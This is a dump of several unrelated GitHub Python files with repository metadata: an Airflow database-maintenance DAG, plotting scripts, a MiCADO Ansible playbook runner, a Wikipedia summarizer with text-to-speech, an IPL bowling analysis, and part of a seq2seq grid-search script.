'retry_delay': timedelta(minutes=1)\n}\n\nMAINTENANCE_DAG = create_dag(\n dag_id=DAG_ID,\n schedule=os.getenv(\n DB_MAINTENANCE_SCHEDULE_INTERVAL_ENV_NAME\n ),\n dagrun_timeout=timedelta(days=1)\n)\n\n\nDEFAULT_AIRFLOW_DB_MAINTENANCE_MAX_CLEANUP_DATA_AGE_IN_DAYS = \"30\"\nMAX_CLEANUP_DATA_AGE_NAME = (\n \"AIRFLOW_DB_MAINTENANCE_MAX_CLEANUP_DATA_AGE_IN_DAYS\"\n)\n\n\ndef get_max_data_cleanup_configuration_function(**context):\n max_data_age_in_days = int(\n Variable.get(\n MAX_CLEANUP_DATA_AGE_NAME,\n os.getenv(\n MAX_CLEANUP_DATA_AGE_NAME,\n DEFAULT_AIRFLOW_DB_MAINTENANCE_MAX_CLEANUP_DATA_AGE_IN_DAYS\n )\n )\n )\n max_date = timezone.utcnow() + timedelta(-max_data_age_in_days)\n context[\"ti\"].xcom_push(key=\"max_date\", value=max_date.isoformat())\n\n\nget_configuration = PythonOperator(\n task_id='get_configuration',\n python_callable=get_max_data_cleanup_configuration_function,\n dag=MAINTENANCE_DAG\n)\n\n\ndef cleanup_function(**context):\n\n logging.info(\"Retrieving max_execution_date from XCom\")\n max_date = context[\"ti\"].xcom_pull(\n task_ids=get_configuration.task_id, key=\"max_date\"\n )\n max_date = dateutil.parser.parse(max_date) # stored as iso8601 str in xcom\n\n airflow_db_model = context[\"params\"].get(\"airflow_db_model\")\n age_check_column = context[\"params\"].get(\"age_check_column\")\n keep_last = context[\"params\"].get(\"keep_last\")\n keep_last_filters = context[\"params\"].get(\"keep_last_filters\")\n keep_last_group_by = context[\"params\"].get(\"keep_last_group_by\")\n\n logging.info(\"Running Cleanup Process...\")\n query = session.query(airflow_db_model).options(\n load_only(age_check_column)\n )\n if keep_last:\n subquery = session.query(func.max(DagRun.execution_date))\n if keep_last_filters is not None:\n for entry in keep_last_filters:\n subquery = subquery.filter(entry)\n\n if keep_last_group_by is not None:\n subquery = subquery.group_by(keep_last_group_by)\n\n subquery = subquery.from_self()\n\n query = query.filter(\n 
and_(age_check_column.notin_(subquery)),\n and_(age_check_column <= max_date)\n )\n\n else:\n query = query.filter(age_check_column <= max_date,)\n\n if ENABLE_DELETE:\n logging.info(\"Performing Delete...\")\n # using bulk delete\n query.delete(synchronize_session=False)\n session.commit()\n logging.info(\"Finished Performing Delete\")\n\n logging.info(\"Finished Running Cleanup Process\")\n\n\nfor db_object in DATABASE_OBJECTS:\n\n cleanup_op = PythonOperator(\n task_id='cleanup_' + str(db_object[\"airflow_db_model\"].__name__),\n python_callable=cleanup_function,\n params=db_object,\n dag=MAINTENANCE_DAG\n )\n # pylint: disable=pointless-statement\n get_configuration >> cleanup_op\n","repo_name":"elifesciences/data-hub-core-airflow-dags","sub_path":"dags/dag_maintenance.py","file_name":"dag_maintenance.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"26145451743","text":"import matplotlib.pyplot as plt\nfrom load import get_data\n\ndata = get_data()\n\nheatmap = []\nfor conv in range(20):\n row = []\n for learn in range(20):\n data_list = data[(conv / 10, learn / 10)]\n total = sum([d[\"fitnessSums0\"] + d[\"fitnessSums1\"] + d[\"fitnessSums2\"] for d in data_list])\n row.append(total / 10)\n heatmap.append(row)\n\nplt.imshow(heatmap, cmap=\"hot\", interpolation=\"nearest\")\nplt.ylabel(\"convergence_rate\")\nplt.xlabel(\"learning_rate\")\nplt.show()\n","repo_name":"cooperuser/ctrnn-test","sub_path":"experiments/test/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18818163435","text":"import os\nimport shutil\nimport tarfile\nfrom pathlib import Path\n\nimport ansible_runner\nimport requests\n\nPLAYBOOK_NAME = \"micado.yml\"\nPLAYBOOK_INTERNAL = \"playbook\"\nROTATION = 100 # max number of artifacts (logs, etc...) 
to keep\nQUIET = True # hide ansible output\n\n\nclass Playbook:\n def __init__(self, version: str, id: str, home_dir: str):\n self.version: str = version\n self.id: str = id\n self.tar_download: Path = Path(f\"{home_dir}micado-{version}.tar.gz\")\n self.playbook_path: Path = Path(f\"{home_dir}micado-{version}\")\n\n def run(self, hosts: dict, extravars: dict, playbook: str = None):\n \"\"\"Run the playbook\"\"\"\n if not self.playbook_exists():\n self.download()\n self.extract()\n \n data_dir = self.playbook_path / PLAYBOOK_INTERNAL\n\n # fix_hosts_permissions() because https://github.com/ansible/ansible-runner/issues/853\n fix_hosts_permissions(data_dir)\n runner = ansible_runner.interface.run(\n ident=self.id,\n playbook=playbook or PLAYBOOK_NAME,\n private_data_dir=str(data_dir),\n inventory=hosts,\n extravars=extravars,\n rotate_artifacts=ROTATION,\n quiet=QUIET,\n )\n fix_hosts_permissions(data_dir)\n return runner\n\n def download(self):\n \"\"\"Download playbook from GitHub and write down to home directory.\"\"\"\n url = f\"https://github.com/micado-scale/ansible-micado/tarball/{self.version}\"\n r = requests.get(url, stream=True)\n\n with open(self.tar_download, \"wb\") as f:\n f.write(r.content)\n\n if not tarfile.is_tarfile(self.tar_download):\n os.remove(self.tar_download)\n raise TypeError(f\"Download failed - check MiCADO {self.version} exists.\")\n\n def extract(self):\n \"\"\"Extract tar to the directory where it was downloaded\"\"\"\n if not os.path.isfile(self.tar_download):\n raise FileNotFoundError(\"Playbook tarball not found. Cannot extract.\")\n\n tar_file = tarfile.open(self.tar_download)\n tar_path = self.tar_download.parent / tar_file.firstmember.name\n tar_file.extractall(self.tar_download.parent)\n tar_file.close()\n\n # Don't overwrite an existing playbook of the same version\n try:\n tar_path.rename(self.playbook_path)\n except OSError:\n shutil.rmtree(str(tar_path))\n\n self.tar_download.unlink() # delete the tarball\n\n def remove(self):\n \"\"\"Remove the playbook directory\"\"\"\n if not self.playbook_path:\n raise FileNotFoundError(\"Playbook directory not found. 
Cannot remove.\")\n shutil.rmtree(str(self.playbook_path))\n self.playbook_path = None\n\n def playbook_exists(self):\n \"\"\"Check if playbook directory exists\"\"\"\n return os.path.isdir(self.playbook_path)\n\ndef fix_hosts_permissions(path: Path):\n try:\n os.chmod(path / \"inventory/hosts.json\", 0o600)\n except FileNotFoundError:\n pass","repo_name":"micado-scale/micado-client","sub_path":"micado/installer/ansible/playbook.py","file_name":"playbook.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"36815188794","text":"import sys\r\n\r\ndef remove_repetitions(text):\r\n if len(text) == 0: return text\r\n result = [text[0]]\r\n for char in text[1:]:\r\n if char != result[-1]:\r\n result.append(char)\r\n return ''.join(result)\r\n\r\ndef main():\r\n test_cases = open(sys.argv[1], 'r')\r\n for test in test_cases:\r\n test = test.strip()\r\n if len(test) == 0:\r\n continue\r\n print(remove_repetitions(test))\r\n test_cases.close()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n'''import sys\r\ntest_cases = open(sys.argv[1], 'r')\r\nfor test in test_cases:\r\n # ignore test if it is an empty line\r\n # 'test' represents the test case, do something with it\r\n # ...\r\n # ...\r\n #test=test.split()\r\n test = test.strip()\r\n result=[test[0]]\r\n #print result\r\n for char in test[1:]:\r\n #print char\r\n if char != result[-1]:\r\n result.append(char)\r\n print ''.join(result)\r\ntest_cases.close()\r\n'''","repo_name":"Kavit900/codeeval","sub_path":"0-easy/without-repetitions/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"6600248063","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 15 18:01:36 2020\r\n\r\n@author: hawk\r\n\r\nTODO:\r\n ~fix summary bug that summarizes somthing else\r\n ~do a try except for the summary function ( https://stackoverflow.com/questions/25946692/wikipedia-disambiguation-error ) \r\n \r\n pass content into the summerize function\r\n \r\n \r\n \r\n\"\"\"\r\n # summarizer libraries \r\nimport sumy\r\nfrom sumy.parsers.plaintext import PlaintextParser\r\nfrom sumy.nlp.tokenizers import Tokenizer\r\nfrom sumy.summarizers.lex_rank import LexRankSummarizer\r\n\r\nimport keyboard\r\n\r\n\r\nimport wikipedia\r\nimport random\r\nimport pyttsx3\r\nimport sys\r\nimport json\r\nimport time\r\n\r\n\r\n# lists of People\r\n\r\n#line function\r\ndef line():\r\n line = print(\"_\" * 100, \"\\n\")\r\n\r\n#this is the main function where the program starts\r\ndef main(): \r\n #start of output\r\n #make a line\r\n line()\r\n \r\n #asking user for input\r\n opt1 = input(\"\"\"what do you what to look up?\r\n \r\nJust start typing to lookup somthing.\r\n\r\nor type \"im feeling lucky\"\r\n\r\n\"\"\" )\r\n\r\n #print a line\r\n #make opt1 lowwer case\r\n opt1 = opt1.lower()\r\n \r\n \r\n #logic\r\n if opt1 == \"im feeling lucky\":\r\n ImFeelingLucky()\r\n else:\r\n wikiSearch = Search(opt1)\r\n print(wikiSearch)\r\n logic(wikiSearch, opt1)\r\n \r\n \r\n \r\n\r\ndef RNG(Low, High):\r\n \r\n RNG = random.randint(Low, High)\r\n return RNG\r\n\r\ndef logic(opt1, objectBeingSearched):\r\n #pages\r\n line()\r\n wikiPages = opt1 #Pages(opt1)\r\n print(\"*** Page ***\")\r\n print(\"page \", wikiPages)\r\n \r\n #content\r\n content = Content(opt1)\r\n \r\n # summary \r\n summySummary = summerize_the_research(content, 
objectBeingSearched)\r\n print(summySummary, \"test\")\r\n TTS(summySummary)\r\n \r\n opt2 = input(\"do you want references? (y/n) \")\r\n opt2.lower() \r\n \r\n if opt2 == \"y\":\r\n references(opt1)\r\n \r\n \r\n \r\n\r\n\r\ndef DisambiguationErrorView(Input, errInput):\r\n line()\r\n # print(\"\\nThere was an error with\" , Input, \"\\n\")\r\n print(Input, \"is ambiguous and could mean a lot. What did you mean?\")\r\n #making the errInput a list\r\n errOptions = errInput.options\r\n #incrmenting a number to display to user\r\n incrmenting = 1\r\n \r\n #this sleeps for X seconds\r\n #time needs to be imported to work\r\n time.sleep(3)\r\n #This for loop prints the errOptions list one at a time\r\n for x in errOptions:\r\n print(incrmenting, x)\r\n incrmenting += 1\r\n \r\n #ask the user what they want to look up.\r\n #if they dont use a number try again\r\n \r\n while True:\r\n try:\r\n UserInput = int(input(\" 'Use the number to select' \"))\r\n break\r\n except ValueError:\r\n print(\"Please use the number\")\r\n continue\r\n #pulling what the user wants from the list\r\n #we - 1 because computers start at 0\r\n #EX: user wants displayed index 3 that would be 2 in the list\r\n userChoice = errOptions[UserInput-1]\r\n wikiPages = Pages(userChoice)\r\n return wikiPages\r\n\r\n\r\n\r\ndef Summaryold(Input):\r\n #getting a summary from the input\r\n try:\r\n i = wikipedia.summary(Input, sentences=0, chars=0, auto_suggest=False, redirect=True)\r\n return i\r\n \r\n except wikipedia.DisambiguationError as err:\r\n # line()\r\n # print(\"\\nThere was an error summarizing\" , Input)\r\n # print(\"\\n\", Input, \" is ambiguous and could mean a lot. What did you mean?\")\r\n # print(\"\\n\\nError\", e)\r\n \r\n DisambiguationErrorView(Input, err)\r\n \r\n # incrmenting = 1\r\n # errOptions = err.options\r\n \r\n # for x in errOptions:\r\n # print(incrmenting, x)\r\n # incrmenting += 1\r\n \r\n \r\n\r\n\r\n\r\n\r\ndef Pages(Input):\r\n #getting a page from the input\r\n try:\r\n i = wikipedia.page(Input, auto_suggest=False)\r\n return i\r\n except wikipedia.DisambiguationError as e:\r\n #calling the line function to draw a line\r\n line()\r\n i = DisambiguationErrorView(Input, e)\r\n return i\r\n\r\ndef references(Input):\r\n #geting a referance\r\n i = Input.references()\r\n return i\r\n\r\ndef Content(Input):\r\n #getting content\r\n i = Input.content\r\n return i\r\n\r\ndef Search(Input):\r\n \r\n #search function\r\n wikiSearch = wikipedia.search(Input) \r\n #increment i\r\n i = 1\r\n #print the list to the user\r\n for y in wikiSearch:\r\n print(i, y)\r\n i += 1\r\n \r\n #ask what the user whats to look up\r\n print(\"\\nWhat to you want to search?\")\r\n \r\n #while true run loop true = no errors\r\n while True:\r\n try:\r\n x = int(input(\" 'Use the number to search' \"))\r\n break\r\n except ValueError:\r\n print(\"Please use the number\")\r\n continue\r\n\r\n \r\n #pulls what the user wants to look up\r\n #subtracts 1 because computers start counting at 0 not 1\r\n searched = wikiSearch[x-1]\r\n output = Pages(searched)\r\n \r\n \r\n #returns what the user whats to search\r\n return output\r\n\r\ndef ImFeelingLucky():\r\n #list of people\r\n People = ['Marilyn Monroe', 'Abraham Lincoln', 'Nelson Mandela', 'John F. 
Kennedy',\r\n 'Martin Luther King', 'Queen Elizabeth', 'Winston Churchill', 'Donald Trump',\r\n 'Bill Gates', 'Muhammad Ali', 'Mahatma Gandhi', 'Mother Teresa', 'Christopher Columbus',\r\n 'Charles Darwin', 'Elvis Presley', 'Albert Einstein']\r\n \r\n #list of places \r\n Places = ['Statue of Liberty', 'Eiffel Tower', 'Big Ben', 'Leaning Tower of Pisa',\r\n 'Colosseum', 'Empire State Building', 'Hollywood Sign', 'Golden Gate Bridge',\r\n 'Notre Dame', 'Tokyo Tower', 'London Eye', '''St. Peter's Basilica''',\r\n 'Sagrada Familia', 'Sagrada Familia', 'Great Wall of China', 'Sydney Opera House']\r\n \r\n \r\n ListPicker = RNG(0,2)\r\n \r\n # print(ListPicker)\r\n try:\r\n if ListPicker == 0:\r\n listLen = len(People)\r\n I = RNG(0, listLen)\r\n summ = People[I]\r\n logic(summ)\r\n # print(summ + \"\\n\")\r\n # print(wikipedia.summary(summ))\r\n # TTS(wikipedia.summary(summ))\r\n \r\n elif ListPicker == 1:\r\n listLen = len(Places)\r\n I = RNG(0, listLen)\r\n summ = Places[I]\r\n logic(summ)\r\n # print(summ + \"\\n\")\r\n # print(wikipedia.summary(summ))\r\n # TTS(wikipedia.summary(summ))\r\n \r\n elif ListPicker == 2:\r\n print(\" \")\r\n i = wikipedia.random()\r\n line()\r\n print(i, \"\\n\")\r\n logic(i)\r\n \r\n \r\n except KeyboardInterrupt:\r\n # quit\r\n sys.exit()\r\n\r\n\r\n\r\ndef openTextFile():\r\n # with open(\"wiki.txt\", \"r+\") as a\r\n with open('data.txt', 'a') as f:\r\n return f\r\n \r\n\r\n\r\n\r\ndef TTSSettings():\r\n \r\n engine = pyttsx3.init() # object creation\r\n \r\n \"\"\" RATE\"\"\"\r\n rate = engine.getProperty('rate') # getting details of current speaking rate\r\n print (rate) #printing current voice rate\r\n engine.setProperty('rate', 125) # setting up new voice rate\r\n \r\n \r\n \"\"\"VOLUME\"\"\"\r\n volume = engine.getProperty('volume') #getting to know current volume level (min=0 and max=1)\r\n print (volume) #printing current volume level\r\n engine.setProperty('volume',1.0) # setting up volume level between 0 and 1\r\n \r\n \"\"\"VOICE\"\"\"\r\n voices = engine.getProperty('voices') #getting details of current voice\r\n #engine.setProperty('voice', voices[0].id) #changing index, changes voices. o for male\r\n engine.setProperty('voice', voices[1].id) #changing index, changes voices. 
1 for female\r\n \r\n engine.say(\"Hello World!\")\r\n engine.say('My current speaking rate is ' + str(rate))\r\n engine.runAndWait()\r\n engine.stop()\r\n \r\n \"\"\"Saving Voice to a file\"\"\"\r\n # On linux make sure that 'espeak' and 'ffmpeg' are installed\r\n engine.save_to_file('Hello World', 'test.mp3')\r\n engine.runAndWait()\r\n\r\n#TTS Code\r\ndef TTS(Input):\r\n #Starting the lib\r\n engine = pyttsx3.init()\r\n try:\r\n #computer says Input\r\n engine.say(Input)\r\n engine.runAndWait()\r\n except keyboard.is_pressed: \r\n print(\"ctrl was pressed\")\r\n engine.stop()\r\n sys.exit()\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\ndef WriteToFile(InputStr):\r\n with open(\"data.txt\", \"a\") as data:\r\n InputStr.write()\r\n data.close()\r\n \r\n f = open(\"demofile2.txt\", \"a\")\r\n f.write(\"Now the file has more content!\")\r\n f.close()\r\n\r\ndef ReadFromFile(fileName):\r\n \r\n with open(str(fileName), \"r\") as data:\r\n readData = data.read()\r\n return readData\r\n\r\ndef summerize_the_research(dataToSumm, objectBeingSummed):\r\n #dataToSumm is the data passes in to summarize\r\n \r\n # where the summerizing happens\r\n parser = PlaintextParser.from_string(dataToSumm, Tokenizer(\"english\"))\r\n # print(\"\\n\\n\\t\\t *** Summerize the above info ***\\n\\n\")\r\n #which summ do we want summy to use\r\n # use lexrank - one algorithum to summ data\r\n summarizer = LexRankSummarizer()\r\n #how many sentences do we want to summ\r\n number_of_Sentances = 4\r\n #this is there the summerizer does the work for you.\r\n summary = summarizer(parser.document, number_of_Sentances)\r\n \r\n # print out our resault\r\n print(\"\\n\\n\\t\\t *** Summarized \", objectBeingSummed, \" ***\\n\\n \" )\r\n for sentence in summary:\r\n print(sentence)\r\n \r\n return summary \r\n \r\n #print summ to file\r\n # ExportFile = open(\"sumData.txt\", \"w\")\r\n \r\n # return ExportFile.write(summary)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n '''check if we have a main function if we do run it. '''\r\n \r\n #x = Pages(\"lams\")\r\n #logic(x) \r\n \r\n main()\r\n \r\n\r\n","repo_name":"faychicken2/Wikipedia_Summerizer","sub_path":"TTSsummary3.py","file_name":"TTSsummary3.py","file_ext":"py","file_size_in_byte":9993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"70499468112","text":"import matplotlib.pyplot as plt\r\n\r\nStudentName = ['Vraj','Vishwa',\"Vansh\",'Siya'] # x-axis values\r\n\r\nTotalMarks = [200,300,500,400] #Y-axis values\r\n\r\nplt. bar (StudentName, TotalMarks, color='b',width=[0.8,0.6,0.5,0.7])\r\n\r\n## Plotting graph with same color but diff widths by giving the width\r\n\r\n#sequence as list in the arqument\r\n\r\nplt. xlabel(\"StudentName\") # Giving Title to x-axis\r\n\r\nplt. ylabel(\"TotalMarks\") # Giving Title to y-axis\r\n\r\nplt. title ('Bar Plot With Same Color But Different Widths') # Giving Title to Graph\r\n\r\nplt. 
show() # function to show the plot","repo_name":"Vraj08/MatplotLIb","sub_path":"BarPlot3.py","file_name":"BarPlot3.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12261054478","text":"'''Importing pyplot module of matplotlib library'''\n\nimport matplotlib.pyplot as plt\n\n\ndef start_and_end_match_ids(matches):\n \"\"\"Compute starting match id and ending match id from matches.csv data,\n on the basis of season 2015 to use into deliveries.csv data\n\n :param matches : list of dictionaries of matches.csv data\\n\n :return start_id : int start match id of matches played in 2015\\n\n :return end_id : int end match id of matches played in 2015\n \"\"\"\n start_ids = 10000\n end_ids = -10000\n for match in matches:\n if match['season'] == '2015':\n if int(match['id']) < start_ids:\n start_ids = int(match['id'])\n\n if int(match['id']) > end_ids:\n end_ids = int(match['id'])\n return start_ids, end_ids\n\n\ndef top_economical_bowlers(deliveries, start_id, end_id):\n \"\"\"Compute total runs conceded by each bowler and total deliveries by\n each bowler then top economical bowlers\n\n :param deliveries : list of dictionaries of deliveries.csv data\\n\n :param start_id : int start match id of matches played in 2015\\n\n :param end_id : int end match id of matches played in 2015\\n\n :return top_economy_bowlers : dictionary of bowlers having top economy\n \"\"\"\n total_runs_per_bowler, total_deliveries_per_bowler = {}, {}\n for delivery in deliveries:\n if start_id <= int(delivery['match_id']) <= end_id:\n if delivery['bowler'] not in total_runs_per_bowler:\n if int(delivery['is_super_over']) == 0:\n total_runs_per_bowler[delivery['bowler']] = (\n int(delivery['total_runs']) - (int(delivery['bye_runs']) + int(delivery['legbye_runs'])))\n if int(delivery['noball_runs']) != 0 or int(delivery['wide_runs']) != 0 or int(delivery['is_super_over']) != 0:\n total_deliveries_per_bowler[delivery['bowler']] = 0\n else:\n total_deliveries_per_bowler[delivery['bowler']] = 1\n else:\n if int(delivery['is_super_over']) == 0:\n total_runs_per_bowler[delivery['bowler']] += (\n int(delivery['total_runs']) - (int(delivery['bye_runs']) + int(delivery['legbye_runs'])))\n if int(delivery['noball_runs']) != 0 or int(delivery['wide_runs']) != 0 or int(delivery['is_super_over']) != 0:\n total_deliveries_per_bowler[delivery['bowler']] += 0\n else:\n total_deliveries_per_bowler[delivery['bowler']] += 1\n\n total_economy_per_bowler = {}\n for bowler in total_runs_per_bowler:\n total_economy_per_bowler[float('%.2f' % (\n (total_runs_per_bowler[bowler] / total_deliveries_per_bowler[bowler])*6))] = bowler\n\n total_economy_per_bowler_sorted = {}\n for economy in sorted(total_economy_per_bowler.keys()):\n total_economy_per_bowler_sorted[economy] = total_economy_per_bowler[economy]\n\n top_economy_bowlers, limit_count = {}, 0\n for delivery in total_economy_per_bowler_sorted:\n if limit_count == 10:\n break\n top_economy_bowlers[delivery] = total_economy_per_bowler_sorted[delivery]\n limit_count += 1\n return top_economy_bowlers\n\n\ndef plot_top_economical_bowlers(top_economy_bowler):\n \"\"\"plot horizontal bar chart for top economical bowlers\n\n :param top_economy_bowlers : dictionary of bowlers having top economy\n \"\"\"\n bowlers = list(top_economy_bowler.values())\n economy = list(top_economy_bowler.keys())\n plt.barh(bowlers, economy, color=\"#6c3376\",\n edgecolor=\"#409240\", linewidth=1)\n plt.xlabel('Economy 
rates')\n plt.ylabel('Bowler')\n plt.title('Top economical bowlers 2015')\n plt.show()\n\n\ndef compute_and_plot_top_economical_bowlers(matches, deliveries):\n \"\"\"Handle all the function calls here\n\n :param matches : list of dictionaries of matches.csv data\\n\n :param deliveries : list of dictionaries of deliveries.csv data\n \"\"\"\n start_id, end_id = start_and_end_match_ids(matches)\n top_economy_bowlers = top_economical_bowlers(deliveries, start_id, end_id)\n plot_top_economical_bowlers(top_economy_bowlers)\n","repo_name":"SuryakantKumar/ipl-data-project","sub_path":"ipl_analytics/csv/top_economical_bowlers_2015.py","file_name":"top_economical_bowlers_2015.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"35783404399","text":"from ray import air\nfrom ray import tune\n\nfrom torch.utils.data import DataLoader\nimport pandas as pd\nimport torch\nimport sys\nfrom os import path\n\nfrom transformers import AutoTokenizer, AutoModel, DataCollatorForSeq2Seq, get_linear_schedule_with_warmup\nfrom datasets import load_metric\n\nfrom generative_model import GenerativeModel, train, test, validate\n\nfrom custom_loss import compute_match_score\n\nsys.path.insert(1, '../')\nfrom data_handler import tokenization\n\nsys.path.insert(1, '../kp_match')\nfrom siamese_network import SiameseNetwork\n\ndef concat_tag(df, attribute):\n \"\"\" Concatenates \"summarize:\" tag to a\n column in a dataframe\n Parameters\n ----------\n df: pd.DataFrame\n DataFrame\n attribute: string\n name of column\n Returns\n -------\n df: pd.DataFrame\n Modified dataframe \n \"\"\"\n df[attribute] = df[attribute].apply(lambda x : \"summarize: \"+x)\n return df\n\ndef decode_data(pred, exp, tokenizer):\n \"\"\" Uses the tokenizer to decoded the predicted sentence\n and the expected sentence\n Parameters\n ----------\n pred: array-like\n Predicted tokens\n exp: array-like\n Target tokens\n tokenizer: Tokenizer object\n Tokenizer to perform decoding\n Returns\n -------\n dec_pred: string\n Predicted sentence\n dec_exp: string\n Target sentence\n \"\"\"\n \n \"\"\"\n If the inputs are tensors they must be converted to CPU\n numpy arrays of Integers\n \"\"\"\n if torch.is_tensor(pred):\n pred = pred.type(torch.IntTensor).cpu().data.numpy()\n if torch.is_tensor(exp):\n exp = exp.type(torch.IntTensor).cpu().data.numpy()\n \n # Decode predictions and labels\n dec_pred = tokenizer.batch_decode(pred, skip_special_tokens=True, clean_up_tokenization_spaces=True)\n dec_exp = tokenizer.batch_decode(exp, skip_special_tokens=True, clean_up_tokenization_spaces=True)\n \n return dec_pred, dec_exp\n\ndef compute_metrics(predicted, expected, metrics):\n \"\"\" Compute selected metrics given predictions and targets\n Parameters\n ----------\n predicted: array-like\n Predicted tokens of the model\n expected: array-like\n Target tokens\n metrics: array of strings\n Name of metrics to compute\n Returns\n -------\n metric_results : dict\n For every selected metric, stores the result of the\n computation\n \"\"\"\n \n metric_results = {}\n \n if \"rouge\" in metrics:\n metric = load_metric(\"rouge\")\n res = metric.compute(predictions = predicted, references = expected) \n \n keys_vec = ['precision', 'recall', 'fmeasure']\n metric_results['rouge'] = {}\n \n \"\"\"\n For every type of rouge metric (rouge-1, rouge-2, etc.)\n save precision, recall and fmeasure scores in a dict\n \n Dict example:\n {'rouge': \n {\n 'rouge1': {'precision': 0.19, 
'recall': 0.20, 'fmeasure': 0.18}, \n 'rouge2': {'precision': 0.10, 'recall': 0.10, 'fmeasure': 0.10}, \n 'rougeL': {'precision': 0.18, 'recall': 0.19, 'fmeasure': 0.17}, \n 'rougeLsum': {'precision': 0.18, 'recall': 0.19, 'fmeasure': 0.17}\n }\n }\n \"\"\"\n for k,v in res.items():\n metric_results['rouge'][k] = {}\n for metric in keys_vec:\n metric_results['rouge'][k][metric] = getattr(v.mid, metric)\n \n return metric_results\n\n\ndef tokenization_target(sentences, tokenizer, max_length=512):\n \"\"\" Tokenize target sentences\n Parameters\n ----------\n sentences: array of strings\n Sentences to be tokenized\n tokenizer: Tokenizer object\n Tokenizer to perform tokenization\n max_length: int, default='512'\n Maximum length of tokenization\n Returns\n -------\n input_ids: array-like\n Input IDs of tokenized sentences\n attention_masks: array-like\n Attention masks of tokenized sentences\n labels: array-like\n Target tokens of data\n \"\"\"\n \n input_ids = []\n attention_masks = []\n labels = []\n\n \"\"\"\n Tokenize as target to perform teacher forcing\n \"\"\"\n with tokenizer.as_target_tokenizer():\n for sent in sentences:\n encoding = tokenizer(sent, max_length = max_length, \n return_attention_mask = True,\n pad_to_max_length = True,\n truncation=True\n )\n\n \"\"\"\n Targets are input IDs shifted by one \n (starting from the second position)\n \"\"\"\n labels.append(encoding[\"input_ids\"][1:])\n\n # Store encoding input ID and attention mask\n \n input_ids.append(encoding['input_ids'][:-1])\n\n attention_masks.append(encoding['attention_mask'][:-1])\n\n # Convert the lists into tensors.\n input_ids = torch.as_tensor(input_ids)\n attention_masks = torch.as_tensor(attention_masks)\n labels = torch.as_tensor(labels)\n \n return input_ids, attention_masks, labels\n \n \ndef tokenize_df_gen(df, tokenizer, max_length=512, key_points_on=True):\n \"\"\" Tokenize a dataframe of sentences\n for a generation task\n Parameters\n ----------\n df: pd.Dataframe\n Data to be tokenized\n tokenizer: Tokenizer object\n Tokenizer to perform tokenization\n max_length: int, default='512'\n Maximum length of tokenization\n key_points_on: bool, default=True\n Changes structure of output dict,\n depends on the presence of key_points (True)\n or their absence (False)\n Returns\n -------\n tokenized: array-like\n List of dictionaries containing \n each pair of tokenized argument \n and eventual key-point\n \"\"\"\n \n input_id_args, attention_masks_args = tokenization(df['argument'], tokenizer, max_length=max_length)\n if key_points_on:\n input_id_kps, attention_masks_kps, labels = tokenization_target(df['key_point'], tokenizer, max_length=max_length)\n\n tokenized = [ {\n 'input_ids': input_id_args[i],\n 'attention_mask' : attention_masks_args[i], \n 'decoder_input_ids': input_id_kps[i],\n 'decoder_attention_mask' : attention_masks_kps[i],\n 'labels': labels[i]\n } for i in range(len(input_id_args)) ]\n else:\n tokenized = [ {\n 'input_ids': input_id_args[i],\n 'attention_mask' : attention_masks_args[i]\n } for i in range(len(input_id_args)) ]\n\n return tokenized\n\n\ndef grid_search(train_data, val_data, model_type, params, metrics, device):\n \"\"\" Perform a grid search, given a set of configurations of hyper-parameters.\n Parameters\n ----------\n train_data: pd.DataFrame\n Data on which training is performed\n val_data: pd.DataFrame\n Data on which validation is performed\n model_type: string\n Name of model to be trained\n params: dict\n Configurations of hyper-parameters to test\n metrics: array of 
strings\n Name of metrics to compute\n device: torch device\n Selected device on which to perform the grid search \n (usually a GPU)\n \"\"\"\n \n # Add data to configuration\n params['train_data'] = train_data\n params['val_data'] = val_data\n params['model_type'] = model_type\n \n params['device'] = device\n \n params['metrics'] = metrics\n \n # Set logs to be shown on the Command Line Interface every 30 seconds\n reporter = tune.CLIReporter(max_report_frequency=30)\n \n # Starts grid search using RayTune\n tuner = tune.Tuner(tune.with_resources(trainable,\n {\"cpu\":2, \"gpu\":1}), \n param_space = params, \n tune_config = tune.tune_config.TuneConfig(reuse_actors = False),\n run_config=air.RunConfig(name='gen_'+params['optimizer'], verbose=1, progress_reporter=reporter))\n results = tuner.fit()\n \n # Get a dataframe for the last reported results of all of the trials \n df = results.get_dataframe()\n \n \ndef trainable(config_dict):\n \"\"\" Performs training on a single configuration of hyper-parameters.\n The results are stored in a .csv file.\n Parameters\n ----------\n config_dict: dict\n Data needed to perform training and validation\n (data, hyper-parameters, metrics, etc.)\n \"\"\"\n \n # Empty GPU cache\n torch.cuda.empty_cache()\n \n # Load Generative model with the defined model_type and move it to the desired device\n model = GenerativeModel(config_dict['model_type'])\n model.to(config_dict['device'])\n \n #Tokenize data (both training and validation)\n tokenizer = config_dict['tokenizer']\n config_dict.pop('tokenizer')\n tokenized_tr = tokenize_df_gen(config_dict['train_data'], tokenizer, max_length=config_dict['max_length'])\n tokenized_val = tokenize_df_gen(config_dict['val_data'], tokenizer, max_length=config_dict['max_length'])\n \n # Remove useless data\n config_dict.pop('train_data')\n config_dict.pop('val_data')\n \n # Data is set for seq2seq tasks\n seq2seq_data_collator = DataCollatorForSeq2Seq(tokenizer, model=model, padding=True, max_length=config_dict['max_length'])\n \n \"\"\"\n Create DataLoader object for training data to feed it to the model.\n The data is shuffled at each epoch, it is divided in mini-batches with the batch size selected\n in the hyper-parameters configuration and it is pinned to memory for efficiency.\n Additionally, it uses the pre-defined 